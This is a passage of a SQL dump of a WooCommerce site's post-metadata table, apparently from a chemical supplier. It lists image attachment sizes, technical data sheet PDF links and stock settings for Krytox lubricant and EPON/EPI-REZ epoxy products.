-electrical-laminate-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:36:"EPON-electrical-laminate-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:36:"EPON-electrical-laminate-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (11860, 1019, '_edit_lock', '1474650281:3'); 
INSERT INTO `wp_postmeta` VALUES (11861, 1019, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (11862, 1020, '_wp_attached_file', '2016/08/1163.pdf'); 
INSERT INTO `wp_postmeta` VALUES (11863, 1019, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (11864, 1019, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (11865, 1019, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (11866, 1019, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (11867, 1019, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (11868, 1019, '318_custom_list_file', 'a:2:{s:32:"de109e2b01f8515cd2a73955c144c89a";a:3:{s:4:"name";s:9:"EPON 1163";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/1163.pdf";s:4:"desc";s:13:"EPON 1163 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (11869, 1019, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (11870, 1019, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (11871, 1019, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (11872, 1019, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11873, 1019, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11874, 1019, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (11875, 1019, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11876, 1019, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (11877, 1019, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (11878, 1019, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (11879, 1019, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (11880, 1019, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (11881, 1019, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11882, 1019, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11883, 1019, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11884, 1019, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (11885, 1019, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (11886, 1019, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (11887, 1019, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (11888, 1019, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11889, 1019, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11890, 1019, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (11891, 1019, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11892, 1019, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (11893, 1019, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (11894, 1019, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11895, 1019, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (11896, 1019, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (11897, 1019, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (11898, 1019, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (11899, 1021, '_wp_attached_file', '2016/08/krytox-bearing-oil-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (11900, 1021, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4368;s:6:"height";i:2912;s:4:"file";s:37:"2016/08/krytox-bearing-oil-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:37:"krytox-bearing-oil-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:37:"krytox-bearing-oil-grease-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:37:"krytox-bearing-oil-grease-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:37:"krytox-bearing-oil-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"krytox-bearing-oil-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"krytox-bearing-oil-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:37:"krytox-bearing-oil-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (11901, 1022, '_wp_attached_file', '2016/08/krytox-bearing-oil-grease-1.jpg'); 
INSERT INTO `wp_postmeta` VALUES (11902, 1022, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4256;s:6:"height";i:2832;s:4:"file";s:39:"2016/08/krytox-bearing-oil-grease-1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-1-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-1-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-1-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"krytox-bearing-oil-grease-1-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-1-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-1-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-1-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-1-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (11903, 1023, '_wp_attached_file', '2016/08/krytox-bearing-oil-grease2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (11904, 1023, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4256;s:6:"height";i:2832;s:4:"file";s:38:"2016/08/krytox-bearing-oil-grease2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:38:"krytox-bearing-oil-grease2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:38:"krytox-bearing-oil-grease2-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:38:"krytox-bearing-oil-grease2-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease2-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:38:"krytox-bearing-oil-grease2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:38:"krytox-bearing-oil-grease2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:38:"krytox-bearing-oil-grease2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:38:"krytox-bearing-oil-grease2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (11905, 1024, '_wp_attached_file', '2016/08/krytox-bearing-oil-grease-3.jpg'); 
INSERT INTO `wp_postmeta` VALUES (11906, 1024, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5657;s:6:"height";i:3771;s:4:"file";s:39:"2016/08/krytox-bearing-oil-grease-3.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-3-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-3-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-3-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"krytox-bearing-oil-grease-3-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-3-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-3-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-3-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-3-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (11907, 1025, '_wp_attached_file', '2016/08/krytox-bearing-oil-grease-4.jpg'); 
INSERT INTO `wp_postmeta` VALUES (11908, 1025, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3149;s:6:"height";i:2000;s:4:"file";s:39:"2016/08/krytox-bearing-oil-grease-4.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-4-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-4-800x508.jpg";s:5:"width";i:800;s:6:"height";i:508;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-4-768x488.jpg";s:5:"width";i:768;s:6:"height";i:488;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"krytox-bearing-oil-grease-4-1600x1016.jpg";s:5:"width";i:1600;s:6:"height";i:1016;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-4-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-4-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-4-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-4-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:44;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (11909, 1026, '_wp_attached_file', '2016/08/krytox-bearing-oil-grease-5.jpg'); 
INSERT INTO `wp_postmeta` VALUES (11910, 1026, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2500;s:6:"height";i:1661;s:4:"file";s:39:"2016/08/krytox-bearing-oil-grease-5.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-5-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-5-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-5-768x510.jpg";s:5:"width";i:768;s:6:"height";i:510;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"krytox-bearing-oil-grease-5-1600x1063.jpg";s:5:"width";i:1600;s:6:"height";i:1063;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-5-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-5-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-5-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-5-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:67;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (11911, 1027, '_wp_attached_file', '2016/08/krytox-bearing-oil-grease-6.jpg'); 
INSERT INTO `wp_postmeta` VALUES (11912, 1027, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:39:"2016/08/krytox-bearing-oil-grease-6.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-6-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-6-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-6-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"krytox-bearing-oil-grease-6-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-6-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-6-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-6-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-6-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (11913, 1028, '_wp_attached_file', '2016/08/krytox-bearing-oil-grease-7.jpg'); 
INSERT INTO `wp_postmeta` VALUES (11914, 1028, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3888;s:6:"height";i:2592;s:4:"file";s:39:"2016/08/krytox-bearing-oil-grease-7.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-7-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-7-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-7-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"krytox-bearing-oil-grease-7-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-7-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-7-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-7-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-7-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (11915, 1029, '_wp_attached_file', '2016/08/krytox-bearing-oil-grease-8.jpg'); 
INSERT INTO `wp_postmeta` VALUES (11916, 1030, '_wp_attached_file', '2016/08/krytox-bearing-oil-grease-9.jpg'); 
INSERT INTO `wp_postmeta` VALUES (11917, 1030, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4800;s:6:"height";i:6400;s:4:"file";s:39:"2016/08/krytox-bearing-oil-grease-9.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-9-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-9-600x800.jpg";s:5:"width";i:600;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:40:"krytox-bearing-oil-grease-9-768x1024.jpg";s:5:"width";i:768;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:41:"krytox-bearing-oil-grease-9-1200x1600.jpg";s:5:"width";i:1200;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-9-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-9-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-9-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:39:"krytox-bearing-oil-grease-9-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (11918, 992, '_thumbnail_id', '1021'); 
INSERT INTO `wp_postmeta` VALUES (11919, 993, '_thumbnail_id', '1022'); 
INSERT INTO `wp_postmeta` VALUES (11921, 995, '_thumbnail_id', '1024'); 
INSERT INTO `wp_postmeta` VALUES (11922, 996, '_thumbnail_id', '1025'); 
INSERT INTO `wp_postmeta` VALUES (11923, 997, '_thumbnail_id', '1026'); 
INSERT INTO `wp_postmeta` VALUES (11925, 1031, '_edit_lock', '1474649828:3'); 
INSERT INTO `wp_postmeta` VALUES (11926, 1031, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (11927, 999, '_thumbnail_id', '1028'); 
INSERT INTO `wp_postmeta` VALUES (11929, 1032, '_wp_attached_file', '2016/08/3522-W-60.pdf'); 
INSERT INTO `wp_postmeta` VALUES (11930, 1031, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (11931, 1031, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (11932, 1031, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (11933, 1031, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (11934, 1031, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (11935, 1031, '318_custom_list_file', 'a:2:{s:32:"fd215c9d85939f4cbaf4a173d9a5867b";a:3:{s:4:"name";s:17:"EPI-REZ 3522-W-60";s:4:"file";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/3522-W-60.pdf";s:4:"desc";s:21:"EPI-REZ 3522-W-60 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (11936, 1031, '317_default_editor', 'Quart, Gallon, 5 Gallon, 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (11937, 1031, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (11938, 1031, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (11939, 1031, '_downloadable', 'no'); 
